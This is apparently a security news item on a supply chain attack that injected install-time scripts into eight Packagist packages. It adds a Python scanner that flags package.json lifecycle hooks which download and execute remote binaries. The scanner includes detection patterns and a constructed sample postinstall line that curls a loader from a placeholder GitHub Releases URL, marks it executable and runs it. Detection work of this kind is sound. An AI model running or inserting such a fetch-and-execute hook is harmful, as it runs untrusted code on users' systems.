A coordinated supply chain attack has compromised eight packages on Packagist by injecting code that executes a binary fetched from a GitHub Releases URL, targeting projects that ship JavaScript dependencies.
A new supply chain attack campaign has impacted eight packages listed on Packagist. The malicious code was designed to execute a Linux binary retrieved from a GitHub Releases URL. Although the affected packages were Composer packages, the malicious code was inserted into the package.json file rather than composer.json, specifically targeting projects that ship JavaScript.
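Because package.json cannot carry executable code except through its `scripts` entries, the install-time lifecycle hooks are the natural place to look for an injection like the one described. The following is an added detection example (not code from the article or from any affected package) that flags lifecycle scripts which download from a GitHub Releases URL, invoke a downloader, or execute what they fetched; the sample manifests and the `example-org/example-repo` URL are constructed.

```python
"""Flag package.json lifecycle scripts that fetch and run remote code."""
import json
import re

# npm runs these hooks automatically during `npm install`, so they are the
# usual place for injected code that should never need network access.
LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare", "prepublish"}

# Indicators: a GitHub Releases asset URL, generic downloaders, and
# shell constructs that execute whatever was just fetched.
GITHUB_RELEASE_URL = re.compile(
    r"https?://github\.com/[^/\s]+/[^/\s]+/releases/download/\S+")
DOWNLOADER = re.compile(r"\b(curl|wget)\b")
EXEC_FETCHED = re.compile(r"(\|\s*(sh|bash)\b|chmod\s+\+x|&&\s*\./)")


def scan_package_json(text):
    """Return a list of (hook, reasons) for suspicious lifecycle scripts.

    `text` is the raw package.json content. Unparseable JSON is reported
    as a finding too, so a damaged manifest is never silently skipped.
    """
    try:
        manifest = json.loads(text)
    except json.JSONDecodeError as exc:
        return [("<parse>", [f"invalid JSON: {exc.msg}"])]
    findings = []
    for hook, cmd in manifest.get("scripts", {}).items():
        if hook not in LIFECYCLE_HOOKS or not isinstance(cmd, str):
            continue
        reasons = []
        if GITHUB_RELEASE_URL.search(cmd):
            reasons.append("downloads from a GitHub Releases URL")
        if DOWNLOADER.search(cmd):
            reasons.append("invokes curl/wget during install")
        if EXEC_FETCHED.search(cmd):
            reasons.append("executes fetched content")
        if reasons:
            findings.append((hook, reasons))
    return findings


# Constructed sample manifests; the URL is a placeholder, not a real IoC.
BENIGN = json.dumps({"name": "demo", "scripts": {
    "build": "tsc", "postinstall": "node scripts/setup.js"}})
SUSPICIOUS = json.dumps({"name": "demo", "scripts": {
    "postinstall": "curl -sL https://github.com/example-org/example-repo"
                   "/releases/download/v1.0/loader -o /tmp/l "
                   "&& chmod +x /tmp/l && /tmp/l"}})

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(label, scan_package_json(doc))
```

Running the scan over every package.json in `vendor/` after `composer install` covers exactly the case in the article, where the hook rides in a Composer package; installing with `npm install --ignore-scripts` prevents the hooks from running at all.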